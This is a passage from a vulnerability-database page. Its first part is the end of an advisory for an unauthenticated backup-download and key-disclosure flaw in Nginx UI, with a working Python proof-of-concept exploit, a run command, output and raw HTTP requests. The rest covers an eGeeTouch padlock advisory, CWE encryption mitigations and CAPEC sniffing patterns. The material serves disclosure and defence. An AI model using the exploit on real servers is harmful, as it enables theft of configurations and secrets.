encrypted_files:\n filepath = os.path.join(output_dir, filename)\n if not os.path.exists(filepath):\n print(f\"[!] Warning: {filename} not found\")\n continue\n\n print(f\"[*] Decrypting {filename}...\")\n\n with open(filepath, \"rb\") as f:\n encrypted = f.read()\n\n try:\n decrypted = decrypt_aes_cbc(encrypted, key_b64, iv_b64)\n\n # Write decrypted file\n decrypted_path = filepath.replace(\".zip\", \"_decrypted.zip\") if filename.endswith(\".zip\") else filepath + \".decrypted\"\n with open(decrypted_path, \"wb\") as f:\n f.write(decrypted)\n\n print(f\" \u2192 Saved to {decrypted_path} ({len(decrypted)} bytes)\")\n\n # If it\u0027s a ZIP, extract it\n if filename.endswith(\".zip\"):\n extract_dir = os.path.join(output_dir, filename.replace(\".zip\", \"\"))\n os.makedirs(extract_dir, exist_ok=True)\n with zipfile.ZipFile(BytesIO(decrypted), \u0027r\u0027) as inner_zip:\n inner_zip.extractall(extract_dir)\n print(f\" \u2192 Extracted {len(inner_zip.namelist())} files to {extract_dir}\")\n\n except Exception as e:\n print(f\" \u2717 Failed to decrypt {filename}: {e}\")\n\n # Show hash info\n hash_info_path = os.path.join(output_dir, \"hash_info.txt.decrypted\")\n if os.path.exists(hash_info_path):\n print(f\"\\n[*] Hash info:\")\n with open(hash_info_path, \"r\") as f:\n print(f.read())\n\ndef main():\n ap = argparse.ArgumentParser(\n description=\"Nginx UI - Unauthenticated backup download with key disclosure\"\n )\n ap.add_argument(\"--target\", required=True, help=\"Base URL, e.g. http://host:port\")\n ap.add_argument(\"--out\", default=\"backup.bin\", help=\"Where to save the encrypted backup\")\n ap.add_argument(\"--decrypt\", action=\"store_true\", help=\"Decrypt the backup after download\")\n ap.add_argument(\"--extract-dir\", default=\"backup_extracted\", help=\"Directory to extract decrypted files\")\n\n args = ap.parse_args()\n\n url = urllib.parse.urljoin(args.target.rstrip(\"/\") + \"/\", \"api/backup\")\n\n # Unauthenticated request to the backup endpoint\n req = urllib.request.Request(url, method=\"GET\")\n\n try:\n with urllib.request.urlopen(req, timeout=20) as resp:\n hdr = resp.headers.get(\"X-Backup-Security\", \"\")\n key, iv = _parse_keys(hdr)\n data = resp.read()\n except urllib.error.HTTPError as e:\n print(f\"[!] HTTP Error {e.code}: {e.reason}\")\n sys.exit(1)\n except Exception as e:\n print(f\"[!] Error: {e}\")\n sys.exit(1)\n\n with open(args.out, \"wb\") as f:\n f.write(data)\n\n # Key/IV disclosure in response header enables decryption of the downloaded backup\n print(f\"\\nX-Backup-Security: {hdr}\")\n print(f\"Parsed AES-256 key: {key}\")\n print(f\"Parsed AES IV : {iv}\")\n\n if key and iv:\n # Verify key/IV lengths\n try:\n key_bytes = base64.b64decode(key)\n iv_bytes = base64.b64decode(iv)\n print(f\"\\n[*] Key length: {len(key_bytes)} bytes (AES-256 \u2713)\")\n print(f\"[*] IV length : {len(iv_bytes)} bytes (AES block size \u2713)\")\n except Exception as e:\n print(f\"[!] Error decoding keys: {e}\")\n sys.exit(1)\n\n if args.decrypt:\n try:\n extract_backup(args.out, key, iv, args.extract_dir)\n\n except Exception as e:\n print(f\"\\n[!] Decryption failed: {e}\")\n import traceback\n traceback.print_exc()\n sys.exit(1)\n else:\n print(\"\\n[!] Failed to parse encryption keys from X-Backup-Security header\")\n print(f\" Header value: {hdr}\")\n\nif __name__ == \"__main__\":\n main()\n```\n\n```bash\n# Download and decrypt backup (no authentication required)\n# pip install pycryptodome\npython poc.py --target http://victim:9000 --decrypt\n```\n\n```\nX-Backup-Security: gnfd8BhrjzrxS7yLRoVvK+fyV9tjS50cfUn/RWuYjGA=:+rLZrXK3kbWFRK3qMpB3jw==\nParsed AES-256 key: gnfd8BhrjzrxS7yLRoVvK+fyV9tjS50cfUn/RWuYjGA=\nParsed AES IV : +rLZrXK3kbWFRK3qMpB3jw==\n\n[*] Key length: 32 bytes (AES-256 \u00e2\u0153\u201c)\n[*] IV length : 16 bytes (AES block size \u00e2\u0153\u201c)\n\n[*] Extracting encrypted backup to backup_extracted\n[*] Main archive contains: [\u0027hash_info.txt\u0027, \u0027nginx-ui.zip\u0027, \u0027nginx.zip\u0027]\n[*] Decrypting hash_info.txt...\n \u00e2\u2020\u2019 Saved to backup_extracted/hash_info.txt.decrypted (199 bytes)\n[*] Decrypting nginx-ui.zip...\n \u00e2\u2020\u2019 Saved to backup_extracted/nginx-ui_decrypted.zip (12510 bytes)\n \u00e2\u2020\u2019 Extracted 2 files to backup_extracted/nginx-ui\n[*] Decrypting nginx.zip...\n \u00e2\u2020\u2019 Saved to backup_extracted/nginx_decrypted.zip (5682 bytes)\n \u00e2\u2020\u2019 Extracted 17 files to backup_extracted/nginx\n\n[*] Hash info:\nnginx-ui_hash: 7c803b9b8791cebfad36977a321431182b22878c3faf8af544d05318ccb83ad5\nnginx_hash: 183458949e54794e1295449f0d6c1175bb92c1ee008be671ee9ee759aad73905\ntimestamp: 20260129-122110\nversion: 2.3.2\n```\n\n### HTTP Request (Raw)\n\n```http\nGET /api/backup HTTP/1.1\nHost: victim:9000\n\n```\n\n**No authentication required** - this request will succeed and return:\n- Encrypted backup as ZIP file\n- Encryption keys in `X-Backup-Security` header\n\n### Example Response\n\n```http\nHTTP/1.1 200 OK\nContent-Type: application/zip\nContent-Disposition: attachment; filename=backup-20260129-120000.zip\nX-Backup-Security: e5eWtUkqVEIixQjh253kPYe3cpzdasxiYTbOFHm9CJ4=:7XdVSRcgYfWf7C/J0IS8Cg==\n\n[Binary ZIP data]\n```\n\nThe `X-Backup-Security` header contains:\n- **Key**: `e5eWtUkqVEIixQjh253kPYe3cpzdasxiYTbOFHm9CJ4=` (Base64-encoded 32-byte AES-256 key)\n- **IV**: `7XdVSRcgYfWf7C/J0IS8Cg==` (Base64-encoded 16-byte IV)\n\n\u003cimg width=\"1430\" height=\"835\" alt=\"screenshot\" src=\"https://github.com/user-attachments/assets/a2e23c48-2272-4276-81de-fc700ff05b17\" /\u003e\n\n## Resources\n\n- [CWE-306: Missing Authentication for Critical Function](https://cwe.mitre.org/data/definitions/306.html)\n- [CWE-311: Missing Encryption of Sensitive Data](https://cwe.mitre.org/data/definitions/311.html)\n- [OWASP: Broken Authentication](https://owasp.org/www-project-top-ten/2017/A2_2017-Broken_Authentication)\n- [OWASP: Sensitive Data Exposure](https://owasp.org/www-project-top-ten/2017/A3_2017-Sensitive_Data_Exposure)\n- [NIST: Key Management Guidelines](https://csrc.nist.gov/publications/detail/sp/800-57-part-1/rev-5/final)",
"id": "GHSA-g9w5-qffc-6762",
"modified": "2026-03-05T22:37:19Z",
"published": "2026-03-05T18:26:41Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-g9w5-qffc-6762"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27944"
},
{
"type": "WEB",
"url": "https://csrc.nist.gov/publications/detail/sp/800-57-part-1/rev-5/final"
},
{
"type": "PACKAGE",
"url": "https://github.com/0xJacky/nginx-ui"
},
{
"type": "WEB",
"url": "https://owasp.org/www-project-top-ten/2017/A2_2017-Broken_Authentication"
},
{
"type": "WEB",
"url": "https://owasp.org/www-project-top-ten/2017/A3_2017-Sensitive_Data_Exposure"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Nginx-UI Vulnerable to Unauthenticated Backup Download with Encryption Key Disclosure"
}
GHSA-GC5M-6C6C-JVX7
Vulnerability from github – Published: 2021-12-03 00:00 – Updated: 2022-07-13 00:01An issue was discovered in the eGeeTouch 3rd Generation Travel Padlock application for Android. The lock sends a pairing code before each operation (lock or unlock) activated via the companion app. The code is sent unencrypted, allowing any attacker with the same app (either Android or iOS) to add the lock and take complete control. For successful exploitation, the attacker must be able to touch the lock's power button, and must be able to capture BLE network communication.
{
"affected": [],
"aliases": [
"CVE-2021-44518"
],
"database_specific": {
"cwe_ids": [
"CWE-311",
"CWE-319"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-12-02T17:15:00Z",
"severity": "MODERATE"
},
"details": "An issue was discovered in the eGeeTouch 3rd Generation Travel Padlock application for Android. The lock sends a pairing code before each operation (lock or unlock) activated via the companion app. The code is sent unencrypted, allowing any attacker with the same app (either Android or iOS) to add the lock and take complete control. For successful exploitation, the attacker must be able to touch the lock\u0027s power button, and must be able to capture BLE network communication.",
"id": "GHSA-gc5m-6c6c-jvx7",
"modified": "2022-07-13T00:01:49Z",
"published": "2021-12-03T00:00:28Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-44518"
},
{
"type": "WEB",
"url": "https://ashallen.net/the-egeetouch-tsa-smart-lock-is-anything-but"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H",
"type": "CVSS_V3"
}
]
}
Mitigation
Clearly specify which data or resources are valuable enough that they should be protected by encryption. Require that any transmission or storage of this data/resource should use well-vetted encryption algorithms.
Mitigation
- Ensure that encryption is properly integrated into the system design, including but not necessarily limited to:
- Identify the separate needs and contexts for encryption:
- Using threat modeling or other techniques, assume that data can be compromised through a separate vulnerability or weakness, and determine where encryption will be most effective. Ensure that data that should be private is not being inadvertently exposed using weaknesses such as insecure permissions (CWE-732). [REF-7]
- {'xhtml:li': ['Encryption that is needed to store or transmit private data of the users of the system', 'Encryption that is needed to protect the system itself from unauthorized disclosure or tampering']}
- {'xhtml:li': ['One-way (i.e., only the user or recipient needs to have the key). This can be achieved using public key cryptography, or other techniques in which the encrypting party (i.e., the product) does not need to have access to a private key.', 'Two-way (i.e., the encryption can be automatically performed on behalf of a user, but the key must be available so that the plaintext can be automatically recoverable by that user). This requires storage of the private key in a format that is recoverable only by the user (or perhaps by the operating system) in a way that cannot be recovered by others.']}
Mitigation MIT-24
Strategy: Libraries or Frameworks
- When there is a need to store or transmit sensitive data, use strong, up-to-date cryptographic algorithms to encrypt that data. Select a well-vetted algorithm that is currently considered to be strong by experts in the field, and use well-tested implementations. As with all cryptographic mechanisms, the source code should be available for analysis.
- For example, US government systems require FIPS 140-2 certification.
- Do not develop custom or private cryptographic algorithms. They will likely be exposed to attacks that are well-understood by cryptographers. Reverse engineering techniques are mature. If the algorithm can be compromised if attackers find out how it works, then it is especially weak.
- Periodically ensure that the cryptography has not become obsolete. Some older algorithms, once thought to require a billion years of computing time, can now be broken in days or hours. This includes MD4, MD5, SHA1, DES, and other algorithms that were once regarded as strong. [REF-267]
Mitigation MIT-46
Strategy: Separation of Privilege
- Compartmentalize the system to have "safe" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.
- Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges.
Mitigation MIT-25
When using industry-approved techniques, use them correctly. Don't cut corners by skipping resource-intensive steps (CWE-325). These steps are often essential for preventing common attacks.
Mitigation MIT-33
Strategy: Attack Surface Reduction
Use naming conventions and strong types to make it easier to spot when sensitive data is being used. When creating structures, objects, or other complex entities, separate the sensitive and non-sensitive data as much as possible.
CAPEC-157: Sniffing Attacks
In this attack pattern, the adversary intercepts information transmitted between two third parties. The adversary must be able to observe, read, and/or hear the communication traffic, but not necessarily block the communication or change its content. Any transmission medium can theoretically be sniffed if the adversary can examine the contents between the sender and recipient. Sniffing Attacks are similar to Adversary-In-The-Middle attacks (CAPEC-94), but are entirely passive. AiTM attacks are predominantly active and often alter the content of the communications themselves.
CAPEC-158: Sniffing Network Traffic
In this attack pattern, the adversary monitors network traffic between nodes of a public or multicast network in an attempt to capture sensitive information at the protocol level. Network sniffing applications can reveal TCP/IP, DNS, Ethernet, and other low-level network communication information. The adversary takes a passive role in this attack pattern and simply observes and analyzes the traffic. The adversary may precipitate or indirectly influence the content of the observed transaction, but is never the intended recipient of the target information.
CAPEC-204: Lifting Sensitive Data Embedded in Cache
An adversary examines a target application's cache, or a browser cache, for sensitive information. Many applications that communicate with remote entities or which perform intensive calculations utilize caches to improve efficiency. However, if the application computes or receives sensitive information and the cache is not appropriately protected, an attacker can browse the cache and retrieve this information. This can result in the disclosure of sensitive information.
CAPEC-31: Accessing/Intercepting/Modifying HTTP Cookies
This attack relies on the use of HTTP Cookies to store credentials, state information and other critical data on client systems. There are several different forms of this attack. The first form of this attack involves accessing HTTP Cookies to mine for potentially sensitive data contained therein. The second form involves intercepting this data as it is transmitted from client to server. This intercepted information is then used by the adversary to impersonate the remote user/session. The third form is when the cookie's content is modified by the adversary before it is sent back to the server. Here the adversary seeks to convince the target server to operate on this falsified information.
CAPEC-37: Retrieve Embedded Sensitive Data
An attacker examines a target system to find sensitive data that has been embedded within it. This information can reveal confidential contents, such as account numbers or individual keys/credentials that can be used as an intermediate step in a larger attack.
CAPEC-383: Harvesting Information via API Event Monitoring
An adversary hosts an event within an application framework and then monitors the data exchanged during the course of the event for the purpose of harvesting any important data leaked during the transactions. One example could be harvesting lists of usernames or userIDs for the purpose of sending spam messages to those users. One example of this type of attack involves the adversary creating an event within the sub-application. Assume the adversary hosts a "virtual sale" of rare items. As other users enter the event, the attacker records via AiTM (CAPEC-94) proxy the user_ids and usernames of everyone who attends. The adversary would then be able to spam those users within the application using an automated script.
CAPEC-384: Application API Message Manipulation via Man-in-the-Middle
An attacker manipulates either egress or ingress data from a client within an application framework in order to change the content of messages. Performing this attack can allow the attacker to gain unauthorized privileges within the application, or conduct attacks such as phishing, deceptive strategies to spread malware, or traditional web-application attacks. The techniques require use of specialized software that allow the attacker to perform adversary-in-the-middle (CAPEC-94) communications between the web browser and the remote system. Despite the use of AiTH software, the attack is actually directed at the server, as the client is one node in a series of content brokers that pass information along to the application framework. Additionally, it is not true "Adversary-in-the-Middle" attack at the network layer, but an application-layer attack the root cause of which is the master applications trust in the integrity of code supplied by the client.
CAPEC-385: Transaction or Event Tampering via Application API Manipulation
An attacker hosts or joins an event or transaction within an application framework in order to change the content of messages or items that are being exchanged. Performing this attack allows the attacker to manipulate content in such a way as to produce messages or content that look authentic but may contain deceptive links, substitute one item or another, spoof an existing item and conduct a false exchange, or otherwise change the amounts or identity of what is being exchanged. The techniques require use of specialized software that allow the attacker to man-in-the-middle communications between the web browser and the remote system in order to change the content of various application elements. Often, items exchanged in game can be monetized via sales for coin, virtual dollars, etc. The purpose of the attack is for the attack to scam the victim by trapping the data packets involved the exchange and altering the integrity of the transfer process.
CAPEC-386: Application API Navigation Remapping
An attacker manipulates either egress or ingress data from a client within an application framework in order to change the destination and/or content of links/buttons displayed to a user within API messages. Performing this attack allows the attacker to manipulate content in such a way as to produce messages or content that looks authentic but contains links/buttons that point to an attacker controlled destination. Some applications make navigation remapping more difficult to detect because the actual HREF values of images, profile elements, and links/buttons are masked. One example would be to place an image in a user's photo gallery that when clicked upon redirected the user to an off-site location. Also, traditional web vulnerabilities (such as CSRF) can be constructed with remapped buttons or links. In some cases navigation remapping can be used for Phishing attacks or even means to artificially boost the page view, user site reputation, or click-fraud.
CAPEC-387: Navigation Remapping To Propagate Malicious Content
An adversary manipulates either egress or ingress data from a client within an application framework in order to change the content of messages and thereby circumvent the expected application logic.
CAPEC-388: Application API Button Hijacking
An attacker manipulates either egress or ingress data from a client within an application framework in order to change the destination and/or content of buttons displayed to a user within API messages. Performing this attack allows the attacker to manipulate content in such a way as to produce messages or content that looks authentic but contains buttons that point to an attacker controlled destination.
CAPEC-477: Signature Spoofing by Mixing Signed and Unsigned Content
An attacker exploits the underlying complexity of a data structure that allows for both signed and unsigned content, to cause unsigned data to be processed as though it were signed data.
CAPEC-609: Cellular Traffic Intercept
Cellular traffic for voice and data from mobile devices and retransmission devices can be intercepted via numerous methods. Malicious actors can deploy their own cellular tower equipment and intercept cellular traffic surreptitiously. Additionally, government agencies of adversaries and malicious actors can intercept cellular traffic via the telecommunications backbone over which mobile traffic is transmitted.
CAPEC-65: Sniff Application Code
An adversary passively sniffs network communications and captures application code bound for an authorized client. Once obtained, they can use it as-is, or through reverse-engineering glean sensitive information or exploit the trust relationship between the client and server. Such code may belong to a dynamic update to the client, a patch being applied to a client component or any such interaction where the client is authorized to communicate with the server.